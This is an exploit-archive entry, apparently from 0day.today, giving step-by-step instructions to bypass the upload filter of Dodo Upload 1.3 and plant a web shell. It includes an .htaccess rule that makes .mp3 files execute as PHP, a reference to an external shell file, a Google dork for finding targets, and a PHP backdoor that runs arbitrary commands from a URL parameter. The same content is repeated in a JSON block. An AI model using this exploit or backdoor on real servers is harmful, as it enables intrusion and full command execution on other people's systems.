Search...

Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability

2010-02-15T00:00:00

ID 1337DAY-ID-10912
Type zdt
Reporter indoushka
Modified 2010-02-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability 
============================================================

========================================================================================                 
| # Title    : Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability                   
| # Author   : indoushka                                 
| # Total alerts found : 1                                               
|                High  : 1                                                                      
|              Medium  :                                                                       
|                  Low :                                                                           
|       Informational  :                                                            
| # Web Site : www.iq-ty.com                                                          
| # Published: http://regretless.com/scripts/                                                                       
| # Dork     : Powered by Dodo, Bubo & Misty. Feed us!                           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Shell upload                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- Shell upload
 
http://localhost/dodoupload/index.php
 
now to by pass Uploader put this code in document text and save as .htaccess
 
code :
 
&lt;FilesMatch "^.*\.mp3"&gt;
   SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
 
now save your evil php to mp3
 
exampl: evil.mp3 (http://www.freewebtown.com/indoushka/indoushka/ch99.php)
 
find your evil in
 
http://localhost/dodoupload/evil.mp3
 
and you can upload a simple backdoor
 
code :
 
&lt;?php
$cmd = $_GET['cmd'];
system($cmd);
?&gt;



#  0day.today [2018-02-02]  #

JSON Vulners Source

Initial Source

{"published": "2010-02-15T00:00:00", "id": "1337DAY-ID-10912", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-02T03:12:42", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-02T03:12:42", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-02-02T03:12:42", "edition": 2, "title": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability ", "href": "https://0day.today/exploit/description/10912", "modified": "2010-02-15T00:00:00", "bulletinFamily": "exploit", "viewCount": 11, "cvelist": [], "sourceHref": "https://0day.today/exploit/10912", "references": [], "reporter": "indoushka", "sourceData": "============================================================\r\nDodo Upload Version 1.3 Upload Shell (By pass) Vulnerability \r\n============================================================\r\n\r\n======================================================================================== \r\n| # Title : Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability \r\n| # Author : indoushka \r\n| # Total alerts found : 1 \r\n| High : 1 \r\n| Medium : \r\n| Low : \r\n| Informational : \r\n| # Web Site : www.iq-ty.com \r\n| # Published: http://regretless.com/scripts/ \r\n| # Dork : Powered by Dodo, Bubo & Misty. Feed us! \r\n| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) \r\n| # Bug : Shell upload \r\n====================== Exploit By indoushka =================================\r\n # Exploit :\r\n \r\n 1- Shell upload\r\n \r\nhttp://localhost/dodoupload/index.php\r\n \r\nnow to by pass Uploader put this code in document text and save as .htaccess\r\n \r\ncode :\r\n \r\n<FilesMatch \"^.*\\.mp3\">\r\n SetHandler application/x-httpd-php\r\n</FilesMatch>\r\n \r\nnow save your evil php to mp3\r\n \r\nexampl: evil.mp3 (http://www.freewebtown.com/indoushka/indoushka/ch99.php)\r\n \r\nfind your evil in\r\n \r\nhttp://localhost/dodoupload/evil.mp3\r\n \r\nand you can upload a simple backdoor\r\n \r\ncode :\r\n \r\n<?php\r\n$cmd = $_GET['cmd'];\r\nsystem($cmd);\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-02] #"}